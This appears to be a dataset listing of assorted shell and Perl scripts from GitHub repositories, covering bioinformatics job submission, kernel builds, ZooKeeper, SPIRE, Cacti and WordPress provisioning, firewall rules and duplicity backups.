[ -d ERR/${scriptName}/ ] || mkdir ERR/${scriptName}/ ; rm -f ERR/${scriptName}/*
rm -f RUN/${scriptName}.sh
# Recreate an empty featurecount output directory per sample.
# (Fixed: the mkdir path used the undefined variable ${myDirr}.)
for sample in "${sampleNames[@]}"
do
[[ -d ${myDir}/../output/${sample}/featurecount/ ]] && rm -fr ${myDir}/../output/${sample}/featurecount/ ; mkdir -p ${myDir}/../output/${sample}/featurecount/
done
# Emit the PBS job script. The \$ and \( escapes keep the array-index
# expansion and the sampleNames=() literal for the *generated* script
# rather than being expanded here.
echo \#!/bin/bash > RUN/${scriptName}.sh
echo \#PBS -P ${project} >> RUN/${scriptName}.sh
echo \#PBS -q ${queue} >> RUN/${scriptName}.sh
echo \#PBS -N ${jobName} >> RUN/${scriptName}.sh
echo \#PBS -l select=1:ncpus=1:mem=${jobMemory} >> RUN/${scriptName}.sh
echo \#PBS -l walltime=${jobLength} >> RUN/${scriptName}.sh
echo \#PBS -o OUT/${scriptName}/ >> RUN/${scriptName}.sh
echo \#PBS -e ERR/${scriptName}/ >> RUN/${scriptName}.sh
echo \#PBS -J 1-${sampleNumber} >> RUN/${scriptName}.sh
echo module load ${moduleSAMTools} >> RUN/${scriptName}.sh
echo module load ${moduleFeatureCounts} >> RUN/${scriptName}.sh
echo sampleNames=\(${sampleNames[*]}\) >> RUN/${scriptName}.sh
echo samtools sort -n ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.markdup.bam ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.markdup >> RUN/${scriptName}.sh
echo cd ${myDir}/../tmp \&\& featureCounts -O -p -F GTF -t exon -g gene_id -a ${myDir}/../resources/${refGTF} -o ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/featurecount/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.markdup.featurecount ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.markdup.bam >> RUN/${scriptName}.sh
echo samtools sort -n ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.rmdup.bam ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.rmdup >> RUN/${scriptName}.sh
echo cd ${myDir}/../tmp \&\& featureCounts -O -p -F GTF -t exon -g gene_id -a ${myDir}/../resources/${refGTF} -o ${myDir}/../output/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}/featurecount/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.rmdup.featurecount ${myDir}/../tmp/\${sampleNames[\$PBS_ARRAY_INDEX - 1]}.sorted.rmdup.bam >> RUN/${scriptName}.sh
chmod u+x RUN/${scriptName}.sh
qsub RUN/${scriptName}.sh
| true |
c336c51b91df351e54fef5db4bbda17ff4d818fc | Shell | misham/stable-kernel | /build_kernel.sh | UTF-8 | 2,785 | 3.296875 | 3 | [] | no_license | #!/bin/bash -e
# Clear any build settings inherited from the environment so that system.sh
# (sourced below) is the single source of configuration.
unset KERNEL_REL
unset KERNEL_PATCH
unset RC_KERNEL
unset RC_PATCH
unset BUILD
unset CC
unset GIT_MODE
unset NO_DEVTMPS
unset FTP_KERNEL
ARCH=$(uname -m)
DIR=$PWD
# Parallel build jobs: CPUs + 1 on x86 hosts, otherwise a single job.
CORES=1
if [ "$ARCH" = "x86_64" ] || [ "$ARCH" = "i686" ] ; then
 CORES=$(grep -c processor /proc/cpuinfo)
 CORES=$((CORES + 1))
fi
# Start with an empty deploy/ directory for this build's artifacts.
if [ ! -e "${DIR}/deploy" ] ; then
 mkdir -p "${DIR}/deploy"
fi
rm -rf "${DIR}"/deploy/*
#######################################
# Build the ARM zImage and copy it into deploy/.
# Globals: DIR, CORES, CC (read); KERNEL_UTS (written)
#######################################
function make_zImage {
 cd "${DIR}/KERNEL/"
 echo "make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y zImage"
 time make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y zImage
 # Kernel release string: third field of the UTS_RELEASE #define with the
 # surrounding quotes stripped (one awk instead of cat | awk | sed).
 KERNEL_UTS=$(awk '{gsub(/"/, ""); print $3}' "${DIR}/KERNEL/include/generated/utsrelease.h")
 cp arch/arm/boot/zImage "${DIR}/deploy/${KERNEL_UTS}.zImage"
 cd "${DIR}"
}
#######################################
# Build the kernel modules, stage them with modules_install and archive
# them as deploy/<release>-modules.tar.gz.
# Globals: DIR, CORES, CC, KERNEL_UTS (read)
#######################################
function make_modules {
 cd "${DIR}/KERNEL/"
 time make -j${CORES} ARCH=arm CROSS_COMPILE=${CC} CONFIG_DEBUG_SECTION_MISMATCH=y modules
 echo ""
 echo "Building Module Archive"
 echo ""
 rm -rf "${DIR}/deploy/mod" &> /dev/null || true
 mkdir -p "${DIR}/deploy/mod"
 make ARCH=arm CROSS_COMPILE=${CC} modules_install INSTALL_MOD_PATH="${DIR}/deploy/mod"
 echo "Building ${KERNEL_UTS}-modules.tar.gz"
 cd "${DIR}/deploy/mod"
 tar czf "../${KERNEL_UTS}-modules.tar.gz" *
 cd "${DIR}"
}
#######################################
# Install the sanitized kernel headers and archive them as
# deploy/<release>-headers.tar.gz.
# Globals: DIR, CC, KERNEL_UTS (read)
#######################################
function make_headers {
 cd "${DIR}/KERNEL/"
 echo ""
 echo "Building Header Archive"
 echo ""
 rm -rf "${DIR}/deploy/headers" &> /dev/null || true
 mkdir -p "${DIR}/deploy/headers/usr"
 make ARCH=arm CROSS_COMPILE=${CC} headers_install INSTALL_HDR_PATH="${DIR}/deploy/headers/usr"
 cd "${DIR}/deploy/headers"
 echo "Building ${KERNEL_UTS}-headers.tar.gz"
 tar czf "../${KERNEL_UTS}-headers.tar.gz" *
 cd "${DIR}"
}
#######################################
# Build Debian kernel packages via the kernel's deb-pkg target and move
# them into deploy/.
# Globals: DIR, CORES, CC, BUILDREV, DISTRO (read; the latter two come
#          from system.sh)
#######################################
function make_deb {
 cd "${DIR}/KERNEL/"
 echo "make -j${CORES} ARCH=arm KBUILD_DEBARCH=armel CROSS_COMPILE=\"${CC}\" KDEB_PKGVERSION=${BUILDREV}${DISTRO} deb-pkg"
 time fakeroot make -j${CORES} ARCH=arm KBUILD_DEBARCH=armel CROSS_COMPILE="${CC}" KDEB_PKGVERSION=${BUILDREV}${DISTRO} deb-pkg
 mv "${DIR}"/dl/*.deb "${DIR}/deploy/" # cause KERNEL is a symlink to dl/<linux>
 cd "${DIR}"
}
# Verify the host has everything needed to build; abort otherwise.
/bin/bash -e "${DIR}/tools/host_det.sh" || exit 1
if [ -e "${DIR}/system.sh" ]; then
 # Pull in the user's build configuration (CC, BUILDREV, DISTRO, ...).
 . system.sh
 if [ "${IS_LUCID}" ] ; then
  echo ""
  echo "IS_LUCID setting in system.sh is deprecated"
  echo ""
 fi
 if [ "${NO_DEVTMPS}" ] ; then
  echo ""
  echo "Building for Debian Lenny & Ubuntu 9.04/9.10"
  echo ""
 else
  echo ""
  echo "Building for Debian Squeeze/Wheezy/Sid & Ubuntu 10.04/10.10/11.04/11.10"
  echo ""
 fi
 make_zImage
 make_modules
 make_headers
 make_deb
else
 echo "Missing system.sh, please copy system.sh.sample to system.sh and edit as needed"
 echo "cp system.sh.sample system.sh"
 echo "gedit system.sh"
fi
| true |
877684345e559bab323bca7f42bdc05d6086a633 | Shell | ivanistheone/writing_scripts | /duplicatewords.sh | UTF-8 | 878 | 3.515625 | 4 | [] | no_license | #!/usr/bin/env perl
# Finds duplicate adjacent words.
use strict ;
my $DupCount = 0 ;
if (!@ARGV) {
print "usage: dups <file> ...\n" ;
exit ;
}
while (1) {
my $FileName = shift @ARGV ;
# Exit code = number of duplicates found.
exit $DupCount if (!$FileName) ;
open FILE, $FileName or die $!;
my $LastWord = "" ;
my $LineNum = 0 ;
while (<FILE>) {
chomp ;
$LineNum ++ ;
my @words = split (/(\W+)/) ;
foreach my $word (@words) {
# Skip spaces:
next if $word =~ /^\s*$/ ;
# Skip punctuation:
if ($word =~ /^\W+$/) {
$LastWord = "" ;
next ;
}
# Found a dup?
if ($word eq $LastWord) {
print "$FileName:$LineNum $word\n" ;
$DupCount ++ ;
}
# Mark this as the last word:
$LastWord = $word ;
}
}
close FILE ;
}
| true |
fa2e0c13ecd375efe164c598b008b5bbfb6dd138 | Shell | Midtrans/docker-kafka | /kafka/scripts/start-zookeeper.sh | UTF-8 | 1,434 | 3.765625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Default ZK configuration:
export ZOOKEEPER_tickTime=2000
export ZOOKEEPER_initLimit=10
export ZOOKEEPER_syncLimit=5
export ZOOKEEPER_dataDir="/var/lib/zookeeper"
export ZOOKEEPER_clientPort=2181
# Keep the helper header in the config :)
echo '# http://hadoop.apache.org/zookeeper/docs/current/zookeeperAdmin.html' > /etc/alternatives/zookeeper-conf/zoo.cfg
# Source configuration from variables names -
# Any environment variable starting with "ZOOKEEPER_"
# will be written to the ZK config file, ie:
# ZOOKEEPER_tickTime=100 results in 'tickTime=100' being written to ZK Config
for VAR in `printenv`; do
NAME=${VAR%=*}
VALUE=${VAR#*=}
if [[ $NAME == "ZOOKEEPER_"* && $NAME != "ZOOKEEPER_SERVERS" && NAME != "ZOOKEEPER_MYID" ]]; then
echo "$(echo $NAME | sed 's/ZOOKEEPER_//')=$VALUE" >> /etc/alternatives/zookeeper-conf/zoo.cfg
fi
done
ZOOKEEPER_MYID=${ZOOKEEPER_MYID:-0}
echo ${ZOOKEEPER_MYID} > /etc/zookeeper/conf/myid
echo "# I am server #${ZOOKEEPER_MYID}" >> /etc/alternatives/zookeeper-conf/zoo.cfg
# Additionally, we'll provide a helper to allow users to easily define a set of ZK servers:
if [ -z ${ZOOKEEPER_SERVERS} ]; then
SERVER_ID=1
IFS=',' read -ra ADDR <<< "$ZOOKEEPER_SERVERS"
for SERVER in "${ADDR[@]}"; do
echo "server.${SERVER_ID}=${SERVER}" >> /etc/alternatives/zookeeper-conf/zoo.cfg
((SERVER_ID++))
done
fi
/usr/share/zookeeper/bin/zkServer.sh start-foreground
| true |
ac1fb9bfe6c3fe8a60c5a8dcf455de9b8a9fe5b3 | Shell | poacomovamos/poacomovamos | /vagrant-box/npm_install_packages.sh | UTF-8 | 325 | 2.828125 | 3 | [] | no_license | #!/bin/sh
if karma --version 2>/dev/null; then
echo "Karma already installed"
else
echo "Installing Karma"
npm install -g karma@canary
fi
if phantomjs --version 2>/dev/null; then
echo "PhantomJS already installed"
else
echo "Installing PhantomJS"
sudo apt-get -y install fontconfig
npm install -g phantomjs
fi | true |
78c79f7197f728106e9bb99bb743ce3806a142e0 | Shell | pabbareddy/mysqlrouterpcf | /start.sh | UTF-8 | 1,088 | 3.140625 | 3 | [] | no_license | #!/bin/bash
#!/usr/bin/env expect
set -ex
{
url=`util/jq -r '.["user-provided"][0]["credentials"]["db-url"]' <<< $VCAP_SERVICES`
user=`util/jq -r '.["user-provided"][0]["credentials"]["db-user"]' <<< $VCAP_SERVICES`
password=`util/jq -r '.["user-provided"][0]["credentials"]["db-password"]' <<< $VCAP_SERVICES`
echo " server at $url. Trying to bootstrap."
# echo -e '$MYSQL_PASSWORD\n$MYSQL_PASSWORD\n' | mysqlrouter --bootstrap "$MYSQL_USER@$MYSQL_HOST:$MYSQL_PORT" --user=mysqlrouter --account $MYSQL_USER ----account-create never --directory /tmp/mysqlrouter --force < "$PASSFILE"
unbuffer expect -c "spawn mysqlrouter --bootstrap $url--user=mysqlrouter --account=$user --account-create=never --directory /tmp/mysqlrouter --conf-base-port=8080 --conf-use-sockets
expect -nocase \"Please enter MySQL password for $user:\" {send \"$password\r\"; exp_continue; interact}"
sed -i -e 's/logging_folder=.*$/logging_folder=/' /tmp/mysqlrouter/mysqlrouter.conf
echo "Starting mysql-router."
exec "$@" --config /tmp/mysqlrouter/mysqlrouter.conf
} &> /dev/null | true |
7262b9fc53e0dd39743f5c2d253c5b9a82b839ce | Shell | sanderson042/spire-tutorials | /metrics/scripts/set-env.sh | UTF-8 | 507 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
norm=$(tput sgr0) || true
bold=$(tput bold) || true
log() {
echo "${bold}$*${norm}"
}
log "Start StatsD-Graphite server"
docker-compose up -d graphite-statsd
log "Start prometheus server"
docker-compose up -d prometheus
log "Start SPIRE Server"
docker-compose up -d spire-server
log "bootstrapping SPIRE Agent..."
docker-compose exec -T spire-server /opt/spire/bin/spire-server bundle show > spire/agent/bootstrap.crt
log "Start SPIRE Agent"
docker-compose up -d spire-agent
| true |
140c68bf3e25594b88235b0f7e8be3a9e9773722 | Shell | arzamuhammad/cdsw-engine-custom-01 | /buildAndDeploy.sh | UTF-8 | 375 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | docker build -t kamir/cdsw-base-with-maven-graphviz-gnuplot-cuda .
export T=$(date +%I_%M_%S)
echo "current time is: ".$T
docker image ls
docker run -it -d --name container_$T kamir/cdsw-base-with-maven-graphviz-gnuplot
docker container ls
read -p "Container-ID to connect to : " C_ID
echo $C_ID
docker exec -i -t $C_ID /bin/bash
docker container stop $C_ID
| true |
6488ba15db11c7f29276d0f8a01731a700af87b4 | Shell | jasonrandrews/Cortex-M-semihosting | /run-m55.sh | UTF-8 | 870 | 3.390625 | 3 | [] | no_license | #!/bin/bash
SYS=Cortex-M55
# Find subdirectory under 'system' folder, which is the compiler used to generate the virtual platform.
BuildDir=$(ls -d system/$SYS/* | grep Lin)
echo $BuildDir
PLUGINS=$PVLIB_HOME/plugins/Linux64_GCC-7.3
# Verify isim_system exists, if it doesn't toss an error
[ ! -f ./$BuildDir/isim_system ] && echo Error, cant find isim_system executable file. Searched directory: ./$BuildDir && exit 0
if [ "$1" = "tarmac" ]; then
TMAC="--plugin $PLUGINS/TarmacTrace.so"
else
TMAC=""
fi
if [ "$1" = "trace" ]; then
CT="--plugin $PLUGINS/GenericTrace.so -C TRACE.GenericTrace.trace-sources=READ_ACCESS,WRITE_ACCESS"
else
CT=""
fi
if [ "$1" = "debug" ]; then
DEBUG="-S -p"
else
DEBUG=""
fi
echo "Running fast model simulation"
./$BuildDir/isim_system -a ./software/$SYS/AC6/hello.axf \
$TMAC \
$CT \
$DEBUG \
--stat
| true |
d0f6eac1d59f71f55832ec2510e4e0a158e799fc | Shell | teocci/GlassfishServer | /scripts/iptables.DISABLE_4848.rules | UTF-8 | 2,517 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# ATTENTION: flush/delete all existing rules
iptables -F
################################################################
# set the default policy for each of the pre-defined chains
################################################################
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP
# allow establishment of connections initialised by my outgoing packets
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
# accept anything on localhost
iptables -A INPUT -i lo -j ACCEPT
################################################################
#individual ports tcp
################################################################
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -j ACCEPT
iptables -A INPUT -p tcp --dport 8181 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
#uncomment next line to enable AdminGUI on port 4848:
#iptables -A INPUT -p tcp --dport 4848 -j ACCEPT
################################################################
#slow down the amount of ssh connections by the same ip address:
#wait 60 seconds if 3 times failed to connect
################################################################
iptables -I INPUT -p tcp -i eth0 --dport 22 -m state --state NEW -m recent --name sshprobe --set -j ACCEPT
iptables -I INPUT -p tcp -i eth0 --dport 22 -m state --state NEW -m recent --name sshprobe --update --seconds 60 --hitcount 3 --rttl -j DROP
#drop everything else
iptables -A INPUT -j DROP
################################################################
#Redirection Rules
################################################################
#1. redirection rules (allowing forwarding from localhost)
iptables -t nat -A OUTPUT -o lo -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A OUTPUT -o lo -p tcp --dport 443 -j REDIRECT --to-port 8181
#2. redirection http
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
#3. redirection https
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8181
################################################################
#save the rules somewhere and make sure
#our rules get loaded if the ubuntu server is restarted
################################################################
iptables-save > /etc/my-iptables.rules
iptables-restore < /etc/my-iptables.rules
#List Rules to see what we have now
iptables -L | true |
329438dad2ae218107ce8e773ee590e631e7c1b9 | Shell | jdavancens/aws-blender-render | /seq_to_video.sh | UTF-8 | 213 | 2.53125 | 3 | [] | no_license | #!/bin/bash
input=/home/ubuntu/output/frames/$1/%03d.png
output=/home/ubuntu/output/video/$1.mp4
echo Image sequence location: $input
echo Output video location: $output
ffmpeg -loglevel verbose -i $input $output
| true |
c62dd1cf05f79b7c0e89fcc92843a88cbf80dca3 | Shell | RobinMeles/eindopdracht | /finalscript.sh | UTF-8 | 4,778 | 3.078125 | 3 | [] | no_license | #!/bin/sh
#Auteur: Robin Meles (studentnummer 283873)
#Datum: 11 juli 2018
#--SALT-MASTER--
apt-get update
apt-get upgrade -y
wget -O - https://repo.saltstack.com/apt/ubuntu/16.04/amd64/latest/SALTSTACK-GPG-KEY.pub | sudo apt-key add -
echo deb http://repo.saltstack.com/apt/ubuntu/16.04/amd64/latest xenial main >> /etc/apt/sources.list.d/saltstack.list
sudo apt-get update
sudo apt-get install salt-master -y
sudo systemctl restart salt-master
sudo sed -i 's/#interface 0.0.0.0/interface 10.0.0.4/' /etc/salt/master
salt-key -A
salt-master
#---CACTI---
#Installeren van cacti op monitor/master
apt-get update
apt-get upgrade -y
apt-get install snmpd -y
apt-get install snmp -y
apt-get install mysql-server -y
apt-get install apache2 -y
apt-get install libapache2-mod-php5 -y
apt-get install php5-mysql -y
apt-get install php5-cli -y
apt-get install php5-snmp -y
apt-get install cacti -y
#Installervan snmp/snmpd voor cacti op minion
salt 'Ubu1604-Minion' cmd.run 'apt-get install snmp -y'
salt 'Ubu1604-Minion' cmd.run 'apt-get install snmpd -y'
#---SYSLOG-NG MASTER---
sudo apt-get install syslog-ng -y
sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK
cat << EOF >> /etc/syslog-ng/syslog-ng.conf
@version: 3.5
@include "scl.conf"
@include "scl-root/system/tty10.conf"
options {
time-reap(30);
mark-freq(10);
keep-hostname(yes);
};
source s_local { system(); internal(); };
source s_network {
syslog(transport(tcp) port(514));
};
destination d_local {
file("/var/log/syslog-ng/messages_${HOST}"); };
destination d_logs {
file(
"/var/log/syslog-ng/logs.txt"
owner("root")
group("root")
perm(0777)
); };
log { source(s_local); source(s_network); destination(d_logs); };
EOF
sudo mkdir /var/log/syslog-ng
sudo touch /var/log/syslog-ng/logs.txt
sudo systemctl start syslog-ng
sudo systemctl enable syslog-ng
#---SYSLOG-NG MINION---
salt 'Ubu1604-Minion' cmd.run 'sudo apt-get install syslog-ng -y'
salt 'Ubu1604-Minion' cmd.run 'sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK'
salt 'Ubu1604-Minion' cmd.run 'cat << EOF >> /etc/syslog-ng/syslog-ng.conf
@version: 3.5
@include "scl.conf"
@include "scl-root/system/tty10.conf"
source s_local { system(); internal(); };
destination d_syslog_tcp {
syslog("10.0.0.4" transport("tcp") port(514)); };
log { source(s_local);destination(d_syslog_tcp); };
EOF'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl start syslog-ng'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl enable syslog-ng'
#---DOCKER---
#Installation of docker according to https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-ce-1
sudo apt-get update
#Install packages to allow apt to use a repository over HTTPS
sudo apt-get install \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
#Add Docker’s official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
# Verify key matches fingerprint: 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88
#apt-key fingerprint 0EBFCD88
#Setting up the stable repository.
sudo add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
sudo apt-get update
#Installing Docker CE
sudo apt-get install docker-ce -y
#Verifying that Docker CE is installed correctly by running the hello-world image
sudo docker run hello-world
#---WORDPRESS---
#Installing Wordpress according to https://www.techrepublic.com/article/how-to-install-wordpress-on-ubuntu-16-04/
wget -c http://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz
#move the entire wordpress folder to /var/www/html to make sure other services can be hosted
sudo rsync -av wordpress/* /var/www/html/
#Giving permissions
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/
#Restarting apache and mysql
sudo systemctl restart apache2.service
sudo systemctl restart mysql.service
#---WORDPRESS MINION---
#Installing Wordpress on the minion according to the same installation guide
salt 'Ubu1604-Minion' cmd.run 'wget -c http://wordpress.org/latest.tar.gz'
salt 'Ubu1604-Minion' cmd.run 'tar -xzvf latest.tar.gz'
salt 'Ubu1604-Minion' cmd.run 'sudo rsync -av wordpress/* /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo chown -R www-data:www-data /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo chmod -R 755 /var/www/html/'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl restart apache2.service'
salt 'Ubu1604-Minion' cmd.run 'sudo systemctl restart mysql.service'
| true |
eec162ba860d99b0aa64733a307ce5b9fd8ab8d4 | Shell | tprk77/ergodox_ez | /flash_firmware.sh | UTF-8 | 381 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Copyright (c) 2018 Tim Perkins
set -o errexit
set -o nounset
set -o pipefail
ERGODOX_EZ_FIRMWARE="build/ergodox_ez_tprk77.hex"
if ! command -v teensy_loader_cli &>/dev/null; then
echo "Missing teensy_loader_cli! See also:"
echo "https://www.pjrc.com/teensy/loader_cli.html"
exit 1
fi
teensy_loader_cli -mmcu=atmega32u4 -v "${ERGODOX_EZ_FIRMWARE}"
exit 0
| true |
7d7a7089982ec623613d776b6ad47ae2ebc65679 | Shell | pervcity/emp-auto-template | /scripts/unrarfuncs.sh | UTF-8 | 1,520 | 4.09375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
function getRarFile() {
local rarfile=$(find "${1}" -maxdepth 1 -type f -name '*.rar' | head -n 1)
echo "${rarfile}"
}
function getMp4File() {
local mp4file=$(find "${1}" -maxdepth 1 -type f -name '*.mp4' | head -n 1)
echo "${mp4file}"
}
function getVolumeFile() {
local filenameinside=$(unrar lb "${1}")
echo "${filenameinside}"
}
function extractRarFile() {
local souredir="${1}"
local targetdir="${2}"
#if no targetdir give, assume same directory
if [[ "${targetdir}" == "" ]]; then
targetdir="${1}"
fi
#does source dir actually exist?
if [ ! -d "${souredir}" ]; then
writelog "Source directory ${souredir} does not exist"
return 1
fi
#does target dir actually exist?
if [ ! -d "${targetdir}" ]; then
writelog "Taget directory ${targetdir} does not exist"
return 1
fi
local rarfile=$(getRarFile "${souredir}")
local fullpath=""
#do we have a existing rar file?
if [ -f "${rarfile}" ]; then
local targetfile=$(getVolumeFile "${rarfile}")
fullpath="${targetdir}/${targetfile}"
#only extract if file in rar file not already exists
if [ ! -f "${targetdir}/${targetfile}" ]; then
$(unrar x -inul -y "${rarfile}" "${targetdir}")
fi
else
writelog "No rar files found in '${souredir}'"
mp4file=$(getMp4File "${souredir}")
if [ -f "${mp4file}" ]; then
fullpath="${targetdir}/${mp4file}"
fi
fi
echo "${fullpath}"
}
# Print the extension of file path $1: the text after the final '.'
# in its base name (the whole name if it contains no dot).
getFileExtension() {
  local base_name
  base_name="$(basename "$1")"
  echo "${base_name##*.}"
}
| true |
89bcb9646ed22700238ba1d2cc530207e50c630c | Shell | petronny/aur3-mirror | /obexpushd/PKGBUILD | UTF-8 | 877 | 2.6875 | 3 | [] | no_license | # Contributor: Andrea Scarpino <andrea@archlinux.org>
# Contributor: w0rm <w0rmtux@gmail.com>
# Arch Linux PKGBUILD metadata for obexpushd: an OBEX push daemon that
# receives files over Bluetooth, IrDA, or TCP.
pkgname=obexpushd
pkgver=0.10.1
pkgrel=1
pkgdesc="Can be used to receive files via Bluetooth/IrDA/TCP"
arch=('i686' 'x86_64')
url="http://www.gitorious.org/obexpushd"
license=('GPL2')
depends=('openobex')
# cmake drives the build; xmlto builds the man pages.
makedepends=('cmake' 'pkgconfig' 'xmlto')
optdepends=('tcp_wrappers')
# Upstream source tarball; checksum below pins this exact release.
source=(http://www.hendrik-sattler.de/downloads/$pkgname/0.10/$pkgname-$pkgver-source.tar.gz)
md5sums=('f917b5cdf19a04134c255c311181a67a')
# makepkg build step: configure with cmake out-of-tree, then compile.
# Runs inside $srcdir, which makepkg populates from source=().
build() {
cd ${srcdir}
# Out-of-tree build directory keeps the unpacked source pristine.
mkdir build
cd build
cmake ../${pkgname}-${pkgver}-source \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=Release
# `|| return 1` is the pre-set-e era makepkg error-propagation idiom.
make || return 1
}
# makepkg package step: install the built tree into the staging dir $pkgdir,
# then relocate the license file and drop the doc directory.
package() {
cd ${srcdir}/build
make DESTDIR=${pkgdir} install || return 1
# Move the LICENSE into Arch's standard per-package licenses location.
install -D -m644 $pkgdir/usr/share/doc/obexpushd/LICENSE \
$pkgdir/usr/share/licenses/$pkgname/LICENSE
# Docs are not shipped; the license copy above was taken first.
rm -rf $pkgdir/usr/share/doc
}
| true |
4aa672a867b50a66149ef27a40814ebcfbace1c8 | Shell | michel-zedler/reveal.js-seeder | /bootstrap.bash | UTF-8 | 384 | 3.203125 | 3 | [] | no_license | #!/usr/bin/env bash
# Abort on any error and trace every command as it runs.
set -ex

# Pinned reveal.js release and the directory it gets unpacked into.
readonly RELEASE="3.7.0"
readonly TARGET="reveal"

# Start from a clean target directory.
rm -rf "${TARGET}" && mkdir "${TARGET}"

# Download the release tarball and unpack it into TARGET,
# stripping the tarball's top-level "reveal.js-<ver>/" folder.
wget "https://github.com/hakimel/reveal.js/archive/${RELEASE}.tar.gz"
tar -C "${TARGET}" -xvzf "${RELEASE}.tar.gz" --strip-components=1
rm *.gz

# Remove the seeder template's own history and scaffolding.
rm -rf .git
rm README.md
rm bootstrap.bash
mv spawned-readme.md README.md

# Re-initialize as a fresh presentation repository.
git init
git add .
git commit -m "New presentation based on reveal.js ${RELEASE}"
| true |
9bf71ca8e1d6a9cb49eac5def78a3ea4835fbc3d | Shell | greenaar/puppet-backupninja | /files/backupninja-dup | UTF-8 | 1,552 | 3.5625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# vim: set filetype=sh sw=3 sts=3 expandtab autoindent:
#
# Copyright (C) 2014 Alexey Remizov <alexey@remizov.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Print command-line usage to stdout.
# Bug fix: the help text said "remove url"; it means the *remote* url
# taken from the duplicity destination config.
print_usage() {
cat << EOF
Usage: backupninja-dup <config> <command> <args>
<command> and <args> are passed duplicity as is
and the remote url and password are taken
from the appropriate <config>.dup
EOF
}
# --- main -------------------------------------------------------------
# $1 is the backup.d config name (without the .dup suffix); $2 is the
# duplicity command; everything after is passed to duplicity verbatim.
dupconfig=$1; shift
command=$1; shift
conffile='/etc/backupninja.conf'
libdirectory="/usr/lib/backupninja"
# Source backupninja's helper library (provides setfile/setsection/getconf).
. $libdirectory/tools
# Read the config directory setting from the main backupninja config.
setfile $conffile
getconf configdirectory /etc/backup.d
dupconfigfile="$configdirectory/$dupconfig.dup"
if [ ! -f $dupconfigfile ]; then
echo "Can't find config of \`$dupconfig'"
print_usage
exit 2
fi
# Pull GPG passphrase and destination settings out of the .dup config.
setfile $dupconfigfile
setsection gpg
getconf password
setsection dest
getconf desturl
getconf ftp_password
# duplicity reads these credentials from the environment, not from argv.
export PASSPHRASE=$password
export FTP_PASSWORD=$ftp_password
# Friendly alias: "status" maps to duplicity's collection-status command.
if [ "$command" = 'status' ]; then
command='collection-status'
fi
# Argument order matters to duplicity: verify/restore take the source URL
# first; every other command takes the destination URL last.
case $command in
verify|restore)
args="$desturl $@"
;;
*)
args="$@ $desturl"
;;
esac
duplicity $command $args
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.